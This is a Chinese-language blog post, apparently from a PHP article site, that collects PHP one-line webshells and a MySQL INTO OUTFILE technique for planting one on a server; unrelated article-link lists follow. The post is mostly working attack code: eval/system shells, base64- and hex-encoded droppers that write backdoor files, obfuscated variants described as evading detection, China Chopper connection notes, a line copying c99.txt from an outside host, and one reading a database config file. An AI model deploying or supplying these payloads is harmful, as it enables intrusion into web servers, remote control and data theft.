PHP与SQL语句写一句话木马总结


Posted in PHP onOctober 11, 2019

一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:

<?php @eval($_GET["code"])?>

<?php @system($_POST["cmd"])?>

二、编码的替换的类型:

<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>

//会生成<?php @eval($_POST['lostwolf']);?>

 

<script language="php">@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script>

//php在html内部的一种嵌入方式

 

<?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>

 

 

<?php

session_start();

$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);

$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>

三、其他类型:

<?php $_GET[a]($_GET[b]);?>

//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

<?php assert($_REQUEST["pass"]);?>   //菜刀连接 躲避检测 密码pass 

<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['pass']);?>

//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass

四、下载类型:

<?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?> 

<? echo file_get_contents("..//cfg_database.php");?> //显示某文件

<? eval ( file_get_contents("远程shell")) ?> //运行远程shell

五、无关键函数类型:

<?php

$_="";

$_[+""]='';

$_="$_"."";

$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");

?>

<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass

<?$_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>

六、补充知识点:

SQL写一句话(MySQL):

select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php"

#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以

以上就是PHP一句话木马小结与SQL语句写一句话木马的详细内容,感谢大家的学习和对三水点靠木的支持。

PHP 相关文章推荐
PHP4实际应用经验篇(2)
Oct 09 PHP
php 应用程序安全防范技术研究
Sep 25 PHP
PHP 文本文章分页代码 按标记或长度(不涉及数据库)
Jun 07 PHP
深入PHP许愿墙模块功能分析
Jun 25 PHP
PHP实现微信公众平台音乐点播
Mar 20 PHP
PHP解决URL中文GBK乱码问题的两种方法
Jun 03 PHP
php中try catch捕获异常实例详解
Nov 21 PHP
php获取访问者IP地址汇总
Apr 24 PHP
php curl模拟post请求和提交多维数组的示例代码
Nov 19 PHP
PHP面向对象程序设计方法实例详解
Dec 24 PHP
PHP的PDO大对象(LOBs)
Jan 27 PHP
PHP levenshtein()函数用法讲解
Mar 08 PHP
解决在Laravel 中处理OPTIONS请求的问题
Oct 11 #PHP
php生成HTML文件的类方法
Oct 11 #PHP
php报错502badgateway解决方法
Oct 11 #PHP
Laravel timestamps 设置为unix时间戳的方法
Oct 11 #PHP
laravel 时间格式转时间戳的例子
Oct 11 #PHP
PHP调用接口API封装的例子
Oct 11 #PHP
Thinkphp5.0框架使用模型Model的获取器、修改器、软删除数据操作示例
Oct 11 #PHP
You might like
PHP中获取内网用户MAC地址(WINDOWS/linux)的实现代码
2011/08/11 PHP
PHP计算一年多少个星期和每周的开始和结束日期
2014/07/01 PHP
PHP获取mysql数据表的字段名称和详细信息的方法
2014/09/27 PHP
jQuery+PHP发布的内容进行无刷新分页(Fckeditor)
2015/10/22 PHP
WordPress中获取页面链接和标题的相关PHP函数用法解析
2015/12/17 PHP
php获取一定范围内取N个不重复的随机数
2016/05/28 PHP
php+redis消息队列实现抢购功能
2018/02/08 PHP
js 判断文件类型并控制表单提交示例代码
2013/11/14 Javascript
JavaScript格式化日期时间的方法和自定义格式化函数示例
2014/04/04 Javascript
node.js实现多图片上传实例
2014/06/03 Javascript
js打造数组转json函数
2015/01/14 Javascript
关于获取DIV内部内容报错的原因分析及解决办法
2016/01/29 Javascript
jQuery EasyUI基础教程之EasyUI常用组件(推荐)
2016/07/15 Javascript
使用jquery给指定的table动态添加一行、删除一行
2016/10/13 Javascript
JavaScript内存泄漏的处理方式
2017/11/20 Javascript
利用Javascript开发一个二维周视图日历
2017/12/14 Javascript
在vue项目创建的后初始化首次使用stylus安装方法分享
2018/01/25 Javascript
layui form.render('select', 'test2') 更新渲染的方法
2019/09/27 Javascript
浅析vue-cli3配置webpack-bundle-analyzer插件【推荐】
2019/10/23 Javascript
vue打包通过image-webpack-loader插件对图片压缩优化操作
2020/11/12 Javascript
[06:16]《DAC最前线》之地区预选赛全面回顾
2015/01/19 DOTA
Python之os操作方法(详解)
2017/06/15 Python
详解Numpy中的广播原则/机制
2018/09/20 Python
解决Python selenium get页面很慢时的问题
2019/01/30 Python
解决Python 写文件报错TypeError的问题
2020/10/23 Python
享誉全球的多元化时尚精品购物平台:Farfetch发发奇(支持中文)
2017/08/08 全球购物
德国家具折扣店:POCO
2020/02/28 全球购物
校长先进事迹材料
2014/02/01 职场文书
解除合同协议书
2014/04/17 职场文书
文艺部部长竞选稿
2015/11/21 职场文书
外出学习心得体会范文
2016/01/18 职场文书
2016年国庆节假期旅游工作总结
2016/04/01 职场文书
八年级作文之一起的走过日子
2019/09/17 职场文书
2019年第四季度财务部门工作计划
2019/11/02 职场文书
Go遍历struct,map,slice的实现
2021/06/13 Golang
Java完整实现记事本代码
2022/06/16 Java/Android